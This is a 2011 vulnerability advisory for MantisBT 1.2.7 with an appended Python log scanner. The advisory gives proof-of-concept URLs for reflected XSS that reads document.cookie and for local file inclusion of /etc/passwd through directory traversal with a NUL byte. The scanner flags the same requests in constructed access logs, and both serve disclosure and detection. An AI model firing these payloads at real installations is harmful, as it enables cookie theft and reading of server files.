MantisBT CMS Multiple Vulnerabilities(SQL/XSS)

2011.09.22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79, CWE-22

Vulnerability ID: HTB23045
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.html
Product: MantisBT
Vendor: www.mantisbt.org ( http://www.mantisbt.org/ )
Vulnerable Version: 1.2.7 and probably prior
Tested Version: 1.2.7
Vendor Notification: 31 August 2011
Vulnerability Type: Local File Inclusion, XSS
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

Vulnerability Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in MantisBT, which can be exploited to perform cross-site scripting and local file inclusion attacks.

1) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php and bug_actiongroup_page.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.

The following PoC code is available:

http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php and bug_actiongroup_page.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal sequences and URL-encoded NULL bytes.

http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/../../../../../../../etc/passwd%00
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_/../../../../../../../etc/passwd%00

3) Input appended to the URL after manage_config_email_page.php and manage_config_workflow_page.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.

http://[host]/manage_config_email_page.php/%22%3E%3Cimg%20src=1%20onerror=%22javascript:alert%28document.cookie%29;%22%3E/
http://[host]/manage_config_workflow_page.php/%22%3E%3Cimg%20src=1%20onerror=%22javascript:alert%28document.cookie%29;%22%3E/

4) Input passed via the "platform", "os" and "os_build" GET parameters to bug_report_page.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.

http://[host]/bug_report_page.php?platform=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Solution: Upgrade to the most recent version
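As an added detection example (not part of the advisory and not MantisBT's own code): a small Python scanner that flags access-log requests matching the four issues above, i.e. traversal or NUL bytes and HTML metacharacters in the "action" parameter of the bug_actiongroup pages, HTML in the PATH_INFO of the manage_config pages, and HTML in the bug_report_page.php parameters. The log lines are constructed, and the finding labels are an assumption of this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Sep/2011:10:01:02 +0200] "GET /bug_actiongroup_page.php?bug_arr[]=7&action=CLOSE HTTP/1.1" 200 512
10.0.0.9 - - [22/Sep/2011:10:01:05 +0200] "GET /bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/../../../../etc/passwd%00 HTTP/1.1" 200 1320
10.0.0.9 - - [22/Sep/2011:10:01:09 +0200] "GET /bug_actiongroup_page.php?bug_arr[]=1&action=EXT_%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900
10.0.0.9 - - [22/Sep/2011:10:01:12 +0200] "GET /manage_config_email_page.php/%22%3E%3Cimg%20src=1%3E/ HTTP/1.1" 200 700
10.0.0.7 - - [22/Sep/2011:10:01:15 +0200] "GET /bug_report_page.php?platform=Linux&os=Debian HTTP/1.1" 200 2200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
ACTIONGROUP_PAGES = ("/bug_actiongroup_ext_page.php", "/bug_actiongroup_page.php")
CONFIG_PAGES = ("/manage_config_email_page.php", "/manage_config_workflow_page.php")
REPORT_PARAMS = ("platform", "os", "os_build")
HTML_RE = re.compile(r'[<>"]')  # metacharacters a legitimate action name never contains


def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)  # values are already URL-decoded
    if path in ACTIONGROUP_PAGES:
        for action in params.get("action", []):
            decoded = unquote(action)  # also catch a double-encoded value
            if "../" in decoded or "\x00" in decoded:
                return "HTB23045-2 LFI attempt"
            if HTML_RE.search(decoded):
                return "HTB23045-1 XSS attempt"
    for page in CONFIG_PAGES:
        # Issue 3: payload lives in the PATH_INFO after the script name
        if path.startswith(page + "/") and HTML_RE.search(path[len(page):]):
            return "HTB23045-3 XSS via PATH_INFO"
    if path == "/bug_report_page.php":
        for name in REPORT_PARAMS:
            if any(HTML_RE.search(unquote(v)) for v in params.get(name, [])):
                return "HTB23045-4 XSS attempt"
    return None


def scan(log_text):
    """Return (client_ip, request_target, label) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and (label := classify(match.group(1))):
            findings.append((line.split()[0], match.group(1), label))
    return findings
```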

References:

https://github.com/mantisbt/mantisbt/commit/6ede60d3db9e202044f135001589cce941ff6f0f
https://github.com/mantisbt/mantisbt/commit/5b93161f3ece2f73410c296fed8522f6475d273d
https://bugzilla.redhat.com/show_bug.cgi?id=735514
http://www.openwall.com/lists/oss-security/2011/09/04/2
http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066061.html
http://lists.debian.org/debian-security-tracker/2011/09/msg00012.html
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640297
https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.html
http://www.securityfocus.com/bid/49448
http://www.securityfocus.com/archive/1/archive/1/519547/100/0/threaded
http://www.openwall.com/lists/oss-security/2011/09/09/9
http://www.openwall.com/lists/oss-security/2011/09/04/1
http://www.mantisbt.org/bugs/view.php?id=13281
http://www.debian.org/security/2011/dsa-2308
http://secunia.com/advisories/45961

